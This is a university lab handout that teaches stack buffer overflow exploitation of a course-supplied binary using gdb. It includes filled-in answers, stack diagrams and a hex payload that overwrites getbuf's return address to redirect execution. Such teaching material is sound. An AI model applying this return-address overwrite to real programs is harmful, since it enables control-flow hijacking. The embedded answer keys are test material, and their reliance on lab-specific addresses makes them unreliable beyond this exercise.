CS 240 Lab 10
Buffer Launch
This lab will introduce you to buffer overflow, a common type of security vulnerability. You can design an input to a program that takes advantage of (exploits) how the stack is used to call functions. This can cause the program to execute differently from how it was intended to work.
Setup
Open a terminal on cs.wellesley.edu (e.g., using VSCode), and start the buffer assignment using:
cd cs240-repos
cs240 start buffer --solo
Create A Cookie
This assignment requires you to have a unique 8-byte “cookie.” We have provided a `Makefile` which has a recipe to create this cookie.
Go to your buffer directory and open the `Makefile`. A makefile can define variables, but mostly consists of “rules.” A rule starts with a name followed by a colon, possibly with other names after the colon. Then below that line, it has one or more indented lines of code composing the body of the rule. Each of these rules does the following:
- Defines a unique name for the product of the rule (this is the name part before the colon). This is the file that should be produced by running the rule body as shell commands. Within the rule body, writing `$@` will refer to the rule product.
- Defines which other files should already exist before the rule can be run (dependencies). These are listed after the colon on the first line of the rule. The dependency listed first can be referred to in the rule body as `$<`.
- Gives the series of shell commands to execute in order to produce the rule product, assuming the dependencies are all up-to-date. These commands should include one that will produce the rule product file as output.
When you give `make` a rule name, it checks the last-modified times of the dependencies for that rule. If the rule product already exists, and all of the dependency files were last modified earlier than the rule product file, `make` does nothing, because that indicates that the rule product file is already up-to-date. On the other hand, if the rule product is missing or at least one of the dependencies is newer than the rule product, it will run the rule body to update the product file. It also applies this process recursively: when a dependency for one rule is the rule product of another rule, it checks the freshness of the dependencies of the second rule, and so on and so forth.
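The freshness check described above can be sketched in a few lines of Python. This is only an illustration of the idea, not how `make` is implemented: the helper names `needs_rebuild` and `touch` are made up for this example, the files live in a temporary directory, and the sketch ignores the recursive part (checking the dependencies' own rules first).

```python
import os
import tempfile
import time


def needs_rebuild(product, dependencies):
    """Return True if `product` is missing or older than any dependency."""
    if not os.path.exists(product):
        return True
    product_mtime = os.path.getmtime(product)
    # A dependency modified after the product means the product is stale.
    return any(os.path.getmtime(dep) > product_mtime for dep in dependencies)


def touch(path, mtime):
    """Create `path` if needed and set its modification time explicitly."""
    with open(path, "a"):
        pass
    os.utime(path, (mtime, mtime))


with tempfile.TemporaryDirectory() as workdir:
    id_txt = os.path.join(workdir, "id.txt")
    cookie_txt = os.path.join(workdir, "cookie.txt")
    now = time.time()

    touch(id_txt, now - 100)
    missing_product = needs_rebuild(cookie_txt, [id_txt])  # cookie.txt absent

    touch(cookie_txt, now - 50)
    fresh_product = needs_rebuild(cookie_txt, [id_txt])    # product is newer

    touch(id_txt, now)
    stale_product = needs_rebuild(cookie_txt, [id_txt])    # dependency is newer

print(missing_product, fresh_product, stale_product)
```

The three cases correspond to a missing product, an up-to-date product, and a product that is older than its dependency.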
Looking at this `Makefile`, answer the following questions:
Which rule doesn’t have any dependencies (give the rule product name)?
Correct answer: id.txt
Run the `cs240 id` command yourself in the shell, without the `> $@` part that’s in the `Makefile`. Given that `>` redirects output into a file, explain what `id.txt` should contain:
Example answer: It should contain your username.
Now run `ls` in the shell and see whether `id.txt` exists (it probably doesn’t). Then run `make id.txt` in the shell to produce it and check whether you were right.
Note: normally `make` prints out each command it executes. An `@` at the start of a command line in a makefile suppresses this.
The rule that produces `cookie.txt` has one dependency. What is it?
Correct answer: id.txt
If we run `make cookie.txt` now, will `make` need to run the rule for `id.txt`? Why or why not?
Example answer: It won’t. Since we just ran `make id.txt`, the dependency of the `cookie.txt` rule is already up-to-date, so `make` won’t bother to re-run that rule.
Which executable file will the `cookie.txt` rule run to produce the cookie file? (Note that `>` in the shell redirects output into a file.)
Correct answer: id2cookie.bin
In addition to creating `cookie.txt`, what else does this rule do?
Example answer: It commits that file into your `git` repository.
The `cookie` rule just prints out your id and cookie. It’s marked as `.PHONY` at the bottom of the file because it doesn’t actually produce a file named `cookie`. What would happen if you ran `make cookie` without first running `make cookie.txt`? Why?
Example answer: Since `cookie.txt` is listed as a dependency of the `cookie` rule, `make` will first check that it is up-to-date. If it doesn’t exist, `make` will run the `cookie.txt` rule to create it (first running the `id.txt` rule if that file is also missing or not up-to-date). So just running `make cookie` can produce `id.txt` and `cookie.txt` and will still work to print out the cookie. Make is pretty sweet :)
Now run `make cookie` to create and display your cookie. As we just discussed, this will print your cookie in hex and store your CS username and cookie in the files `id.txt` and `cookie.txt`, respectively.
Contents of Repository
List the contents of the repository (use `ls`). You should see the following files (along with a few others):
- `laptop.c`: you are given important parts of the C code that you can read to help you understand how the compiled version works. This is similar to how you were given the `main.c` code for the x86 assignment to help you understand how `adventure.bin` worked.
- `laptop.bin`: compiled/executable version of `laptop.c`. You will run `laptop.bin` using a file containing input to the program. This is similar to how you ran `adventure.bin` using `inputs.txt` in the x86 assignment. You will design the input to the program to take advantage of how the stack is used to get the program to do something different than what was originally intended (this is called an exploit).
- `exploit1.hex`, `exploit2.hex`, `exploit3.hex`, `exploit4.hex`: input files you will write for each of the 4 exploits you will design. These correspond to `inputs.txt` for the x86 assignment, except that you use a separate file for each exploit. Each exploit file must contain the correct number of bytes with the correct hexadecimal value for each byte to represent your exploit.
- `hex2raw.bin`: tool/executable file you are given which helps you prepare to run your exploits. This executable file will take the input you design for an exploit (for example, `exploit1.hex`) and turn it into the proper raw byte form (`exploit1.bytes`) needed to run the program.
- `responses.txt`: file for English descriptions of your exploits. This is similar to `descriptions.txt` in the x86 assignment.
Investigate getbuf
Exercise 1:
In the Terminal, open the laptop executable:
gdb ./laptop.bin
Examine the `getbuf` function using the `list` command:
(gdb) list getbuf
Look for the following three key statements (you may have to hit “enter” to list more lines if they don’t all show up at once):
unsigned long long getbuf() {
char buf[36];
// other statements
unsigned long long val = (unsigned long long)Gets(buf);
// other statements
return val % 40;
}
The function `getbuf()` uses `buf`, an array of 36 bytes, to calculate a value.
Where will the memory for the `buf` array be allocated?
Example answer: Since `buf` is a local variable, space for the 36 bytes is allocated on the stack.
Use `disas getbuf` to confirm your answer: which instruction allocates space for `buf` (along with other local variables of `getbuf`)?
Correct answer: sub $0x30,%rsp
Which register actually holds the `buf` pointer when `Gets` is called?
Correct answer: %rdi
The bytes to fill `buf` are obtained by calling the function `Gets()`, which has the signature:
char* Gets(char* buf)
where `buf` is a pointer to an array of bytes, and the string read from standard input which supplies the bytes is terminated by a newline character (`'\n'`).
The bytes from the input are stored starting at `buf`, which is an address in the stack.
`Gets()` is similar to a C standard library function called `gets()`, which is not safe to use because it does not check to see if the string accepted is longer than the size of the array!
What do you think might happen if the string accepted IS longer than the array? Why is this “not safe?”
The extra bytes will be written over stuff beyond the buffer. Since the buffer is on the stack, these bytes will overwrite important other stack information, like the return address of the current function, which could lead to an attacker gaining control of the system.
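To make the danger concrete, here is a small Python simulation of an unchecked copy. It is only a model: the `bytearray` stands in for a slice of the stack, and the frame size and return-address offset are illustrative assumptions, as is the helper name `unchecked_gets`.

```python
BUF_SIZE = 36        # size of buf in getbuf
FRAME_SIZE = 64      # illustrative: local area, saved %rbp, return address
RETURN_OFFSET = 56   # illustrative offset of the return address from buf


def unchecked_gets(memory, start, data):
    """Copy data plus a NUL terminator into memory with no bounds check."""
    for i, byte in enumerate(data + b"\x00"):
        memory[start + i] = byte


# Model the stack slice, with a return address stored little-endian.
frame = bytearray(FRAME_SIZE)
frame[RETURN_OFFSET:RETURN_OFFSET + 8] = (0x4017e3).to_bytes(8, "little")

# 60 input bytes go into a buffer that was only meant to hold 36.
unchecked_gets(frame, 0, b"A" * 60)

corrupted = int.from_bytes(frame[RETURN_OFFSET:RETURN_OFFSET + 8], "little")
print(hex(corrupted))
```

After the copy, the low bytes of the stored return address hold the ASCII code for `A` (0x41) instead of the original address, which is exactly the kind of corruption an attacker aims for.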
Fill in the stack diagram and registers below for a call to `getbuf` right before it calls the function `Gets`, using the conventions from class and lab (use `disas getbuf` to see the assembly code; you only need to look at the first few lines). First, fill in as much as you can without using `gdb`, then use `gdb` to fill in the rest. Use the following assumptions:
- Assume the return address is `0x4017e3`.
- Assume the value of `%rbp` before the call to `getbuf` was `0x7fffffffb210`.
- Assume the value of `%rsp` before the call to `getbuf` was `0x7fffffffb1f0`.
- For memory slots with known values, fill in hex values starting with `0x`.
- For memory slots that are allocated but which haven’t been initialized yet, write ‘X’.
- For memory slots that are below the stack pointer, write ‘-’.
- When running it with `gdb` to print out actual values, use `run -u pmwh` to get matching stack addresses. When actually doing the assignment, use your own username instead.
Hint: to fill in these values, simulate the effects of each instruction, starting with the `call getbuf` instruction that jumps into `getbuf` (which isn’t shown as part of `disas getbuf`) and ending with the final instruction before the call to `Gets`. Consult the lab slides for reminders about how `call`, `ret`, `push`, and `pop` modify the stack.
Hint 2: The `call getbuf` instruction is the instruction that will determine the value for the first address listed below.
Address | Value | Comments |
---|---|---|
0x7fffffffb1e8 | Correct answer: 0x4017e3 | Example answer: Return address for `getbuf` |
0x7fffffffb1e0 | Correct answer: 0x7fffffffb210 | Example answer: Pushed `%rbp` value. |
0x7fffffffb1d8 | Correct answer: X | Example answer: 16x3 = 48 bytes allocated by `sub`. |
0x7fffffffb1d0 | Correct answer: X | |
0x7fffffffb1c8 | Correct answer: X | |
0x7fffffffb1c0 | Correct answer: X | |
0x7fffffffb1b8 | Correct answer: X | |
0x7fffffffb1b0 | Correct answer: X | |
0x7fffffffb1a8 | Correct answer: - | Example answer: Beyond the current stack pointer. |
0x7fffffffb1a0 | Correct answer: - | |
Register | Value | Comments |
---|---|---|
Correct answer: %rsp | Correct answer: 0x7fffffffb1b0 | The stack pointer |
%rbp | Correct answer: 0x7fffffffb1e0 | The stack “base” pointer for the base of our stack frame. |
%rdi | Correct answer: 0x7fffffffb1b0 | Example answer: Copy of `%rsp` as first argument to `Gets`; this is `buf` from the C code. |
Excluding the 8 bytes for the return address (which is part of `main`’s stack frame), how many total bytes are allocated in `getbuf`’s stack frame?
Correct answer: 56
Explanation: The `push` instruction allocates 8 and the `sub` allocates an additional `0x30` = 3x16 = 48 bytes.
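If you want to double-check the arithmetic, the instruction-by-instruction simulation suggested in the hints can be written out in Python. This is a sketch under the assumptions given for the exercise; the exact instruction that copies `%rsp` into `%rdi` is assumed here (the tables only tell us that `%rdi` ends up holding a copy of `%rsp`).

```python
RSP_BEFORE_CALL = 0x7fffffffb1f0
RBP_BEFORE_CALL = 0x7fffffffb210
RETURN_ADDRESS = 0x4017e3

memory = {}  # address -> 8-byte value stored at that address
rsp, rbp = RSP_BEFORE_CALL, RBP_BEFORE_CALL

# call getbuf: pushes the return address
rsp -= 8
memory[rsp] = RETURN_ADDRESS

# push %rbp: saves the caller's base pointer
rsp -= 8
memory[rsp] = rbp

# mov %rsp,%rbp: the new frame base is the slot holding the old %rbp
rbp = rsp

# sub $0x30,%rsp: allocates 48 bytes for local variables
rsp -= 0x30

# Assumed: %rsp is copied into %rdi as the argument to Gets
rdi = rsp

# Bytes in getbuf's frame, excluding the return address
frame_bytes = (RSP_BEFORE_CALL - 8) - rsp

for address in sorted(memory, reverse=True):
    print(hex(address), hex(memory[address]))
print("rsp", hex(rsp), "rbp", hex(rbp), "rdi", hex(rdi), "frame", frame_bytes)
```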
If you haven’t already, set a breakpoint at the instruction that calls `Gets`, and also set one on the instruction following the call.
(gdb) break *getbuf+12
(gdb) break *getbuf+17
Run the program, using your own username as the argument:
(gdb) run -u your_username
It should stop at your first breakpoint. Which of these commands will display the stack frame plus the return address?
info reg rsp
x /gx $rsp
x /s $rsp
x /8gx $rsp
Run that command and inspect the results. Make sure that the output agrees with your table above.
Remember that you have to read the values in the opposite order from your diagram, since `gdb` displays memory from lowest to highest address.
Now, continue execution so that you hit the next breakpoint, after Gets has been called. On the way, the program will pause to ask for input. Enter the following 40-byte string:
0123456789012345678901234567890123456789
Now that we’re at the second breakpoint, display the stack frame again using the same `x` command. What is the first 8-byte value that you see, at the bottom of the stack (start with `0x`)?
Correct answer: 0x3736353433323130
Explain where that specific value came from:
Example answer: We typed in digits starting with `01234567`, and each digit is represented by 1 byte. The ASCII codes for the digits 0-9 are `0x30`-`0x39` in hexadecimal, and we interpret multi-byte values as little-endian, so we get the value shown above by concatenating the ASCII codes for the first 8 digits we typed, with the first digit typed ending up in the least-significant byte.
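You can reproduce this value outside of `gdb` with a couple of lines of Python, which treats the first eight typed characters as one little-endian 8-byte integer (the variable names here are just for illustration):

```python
typed = "01234567"                      # first 8 characters of the input
raw = typed.encode("ascii")             # one byte per character
value = int.from_bytes(raw, "little")   # first byte is least significant

print([hex(b) for b in raw])
print(hex(value))
```

The first byte in memory (`0x30`, the character `0`) becomes the rightmost pair of hex digits in the printed value.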
The `buf` variable is only 36 bytes, and the assembly code for `getbuf` uses some of the allocated stack space beyond those 36 bytes to store the `variable_length` variable. Since we have input more than 36 bytes and `Gets` does not check for that, part of that variable’s memory may be overwritten. Why is that not an issue?
We haven’t initialized `variable_length` yet and it will get reset when we do.
The `volatile` keyword protects `variable_length` from being overwritten.
40 input characters isn’t enough to overwrite `variable_length`, since there’s a gap between the two variables.
That string was 40 bytes long. What will happen if the string is 48 bytes long?
Example answer: That’s just long enough to fill up the extra 8 bytes of zeroes, and so the final NUL terminator will overwrite the least-significant byte (the last two hex digits) of the old `%rbp`. If we’re lucky, that value isn’t actually being used by anyone and we’ll be fine. If not, other stuff may start to go wrong as the corrupted `%rbp` value results in other code writing values into the wrong memory locations.
What will happen if the string is 56 characters long?
Example answer: In this case we’d overwrite the old `%rbp` value and corrupt the least-significant byte of the return address. We’d almost certainly get a segmentation fault or other error when attempting to return from `getbuf`, but literally anything could happen, since bytes that are probably not aligned with real instructions will be reinterpreted as instructions to run.
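The reasoning for the 40-, 48-, and 56-byte cases comes down to where the terminating NUL byte lands. Here is a short sketch using the addresses from the stack table above (which assume `run -u pmwh`); the function name `nul_lands_in` is made up for this example.

```python
BUF_ADDRESS = 0x7fffffffb1b0   # buf, which is also %rsp before Gets is called
SAVED_RBP = 0x7fffffffb1e0     # slot holding the pushed %rbp
RETURN_SLOT = 0x7fffffffb1e8   # slot holding the return address


def nul_lands_in(input_length):
    """Name the stack region hit by the NUL written after the input bytes."""
    address = BUF_ADDRESS + input_length
    if address < SAVED_RBP:
        return "local variables"
    if address < RETURN_SLOT:
        return "saved %rbp"
    if address < RETURN_SLOT + 8:
        return "return address"
    return "caller's frame"


for length in (40, 48, 56, 64):
    print(length, nul_lands_in(length))
```

Every input byte before the NUL overwrites the regions below that point, so a 56-byte string replaces the whole saved `%rbp` before its NUL touches the return address.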
Now quit out of `gdb`.
Formatting an Exploit String with hex2raw.bin
Basically, your job on the assignment is to design strings of various lengths which represent bytes being stored to the stack when they are accepted as input. Some of the bytes are simply “filler,” to fill up the buffer so that it overflows into other values stored on the stack. The filler bytes can be any value.
However, some bytes must be set to particular values so that the stack is corrupted in a way which will cause the program to do something it was not designed to do.
You will create the string representing the bytes in a file, using the format described in the assignment: Each byte in the byte sequence is written as a pair of hexadecimal digits. Successive bytes may be separated by spaces, but all bytes must be on the same line.
Avoid the use of `0A`, which is the newline character and will cause `Gets` to stop reading input.
Exercise 2:
Use your editor to create a file named `exploit0.hex`. You will enter a string which represents the numbers you want stored to memory, and then create the raw bytes using `hex2raw.bin` (this way you can directly enter your desired bytes, without having to do a reverse lookup in an ASCII table for each byte to figure out what to type in).
In `exploit0.hex`, enter the following 40 values (these values are chosen to be easy to recognize when we display memory in `gdb`):
31 31 31 31 31 31 31 f1 32 32 32 32 32 32 32 f2 33 33 33 33 33 33 33 f3 34 34 34 34 34 34 34 f4 35 35 35 35 35 35 35 f5
Note: You must specify a pair of digits in the `.hex` file to represent each byte, e.g., `01` `02` `03`, etc.
Create the raw bytes in the `.bytes` file from the `.hex` file by entering at the command line:
./hex2raw.bin < exploit0.hex > exploit0.bytes
(Note that we’re using the `<` and `>` shell operators we saw earlier to read input from a file and redirect output to a file.)
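To see what this conversion amounts to, here is a rough Python equivalent of the hex-to-bytes step. It is not the implementation of `hex2raw.bin` and may differ from it in details (for example, in how the end of the input is handled); the function name `hex_to_raw` and the newline check are additions for illustration.

```python
def hex_to_raw(hex_text):
    """Turn pairs of hex digits (optionally space-separated) into raw bytes."""
    raw = bytes.fromhex(hex_text)
    if b"\n" in raw:
        # 0a is the newline character, which would make Gets stop reading.
        raise ValueError("payload contains 0a, which ends the input early")
    return raw


groups = [
    "31 31 31 31 31 31 31 f1",
    "32 32 32 32 32 32 32 f2",
    "33 33 33 33 33 33 33 f3",
    "34 34 34 34 34 34 34 f4",
    "35 35 35 35 35 35 35 f5",
]
raw_bytes = hex_to_raw(" ".join(groups))

print(len(raw_bytes))
print(raw_bytes[:8])
```

Each pair of hex digits becomes exactly one byte, so the 40 values above turn into 40 raw bytes, most of which happen to be printable ASCII digits.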
Start the debugger again, and set a breakpoint at the instruction after the `Gets` call in `getbuf`:
(gdb) break *getbuf+17
What `gdb` command (using `your_username` as the username and `<` to read input from a file) will run the program using the raw `.bytes` file you just created as input?
run -u your_username < ./exploit0.bytes
Run that command, and `gdb` should stop at the breakpoint you set up. Examine the stack:
(gdb) x /8gx $rsp
Display the results, and explain what you see as compared to the last time when we entered digits manually:
This time we see what we wrote in the `.hex` file directly reflected in memory, since `hex2raw.bin` has done the reverse ASCII lookup for us for each pair of hex digits we entered.
Overwrite the return address
Assume that you want to replace the return address for the `getbuf` call on the stack with the address `0x0000000000400e45` (NOTE: this is not the correct value to use for any of the exploits).
Exercise 3:
How many bytes of input would you need in total?
Example answer: 64 bytes to overwrite the entire return address, which will also corrupt one byte beyond it in the stack. 63 bytes is probably enough since the high-order bytes of most return addresses you’d want to use (including text-segment and stack addresses) will be 0. In this specific case, we only need to overwrite the 3 least-significant bytes of the return address since the rest are identical to what’s already there (and zeroes so the NUL won’t be noticed), so 59 bytes is enough.
Modify your `exploit0.hex` string to accomplish this and display the contents of your file below:
Example answer: 31313131313131f1 32323232323232f2 33333333333333f3 34343434343434f4 35353535353535f5 36363636363636f6 37373737373737f7 450e4000000000
Note: this answer uses a space after every 8 bytes (16 hex digits) to make it easier to count out the bytes. It also uses exactly 63 bytes so that it overwrites the entire 8-byte return address when you count the trailing NUL byte that gets added automatically. Your answer can contain almost ANY bytes you want (other than `0a`), as long as there are the right number of them before the `45`, `0e`, and `40`.
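If counting bytes by hand gets tedious, a payload like this one can be generated with a short script. This is a sketch for this practice exercise only: the target address is the placeholder from above (not a value for any real exploit), and the filler pattern simply mirrors the recognizable bytes used earlier.

```python
import struct

TARGET = 0x400e45    # placeholder address from this exercise
FILLER_GROUPS = 7    # 7 groups x 8 bytes = 56 bytes before the return address

# Recognizable filler: 31 31 31 31 31 31 31 f1, 32 ... f2, and so on.
filler = b"".join(
    bytes([0x30 + n] * 7 + [0xf0 + n]) for n in range(1, FILLER_GROUPS + 1)
)

# Little-endian address, minus its top byte: the NUL terminator that is
# added automatically after the input supplies that final zero byte.
address = struct.pack("<Q", TARGET)[:7]

payload = filler + address
hex_text = " ".join(payload[i:i + 8].hex() for i in range(0, len(payload), 8))

print(len(payload))
print(hex_text)
```

The printed text has the same layout as the example answer and could be pasted into `exploit0.hex` before running `hex2raw.bin`.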
Now create the raw bytes in the `.bytes` file from the `.hex` file by entering at the command line:
./hex2raw.bin < exploit0.hex > exploit0.bytes
Note that you can run terminal commands without having to quit out of `gdb` and set up your breakpoints again by typing `!` within `gdb` followed by the terminal command. You could also just open up a second terminal to run commands alongside `gdb`.
If you need to, start `gdb` again and set up the breakpoint after the `Gets` call in `getbuf`.
Run the program using the raw bytes file and examine the stack:
(gdb) run -u your_username < ./exploit0.bytes
...
(gdb) x /8gx $rsp
Confirm that you have successfully overwritten the return address by entering the last 8-byte hex value displayed by that command:
Correct answer: 0x0000000000400e45
Run `disas 0x400e45` to display the code that’s at the return address we just set up. Based on the result you see, what do you think will happen when we continue to execute the program in `gdb`?
Example answer: `gdb` just says “No function contains the specified address.” Since the address isn’t code, it’s most likely going to be in a different segment which will not be marked as executable, and so we’ll get a segmentation fault when we continue.
Use `c` to continue in `gdb` and confirm your prediction.
The `usage` function defined in `laptop.c` offers a way to exit the program cleanly, since it ends up calling `exit` rather than simply returning. Use `disas` to figure out what return address we should use if we want to jump straight to the `exit` call within the `usage` function when we’re done with `getbuf` (write down the address starting with `0x` but omitting leading 0s):
Correct answer: 0x4014bf
Explanation: Note that `0x4014bd` is also a reasonable choice as that would set the argument to `exit` to 0 first.
Edit your `exploit0.hex` to use this return address value, run `hex2raw.bin` to create a new `exploit0.bytes`, and run the program. Confirm that it exits normally if you continue past your breakpoint.
NOTE: Although this lab contains essential details for Buffer, you should also read the assignment carefully, since it contains additional information not included in the lab exercises.
You are ready to begin working on exploit 1 on the assignment. Use remaining lab time to start working on the assignment.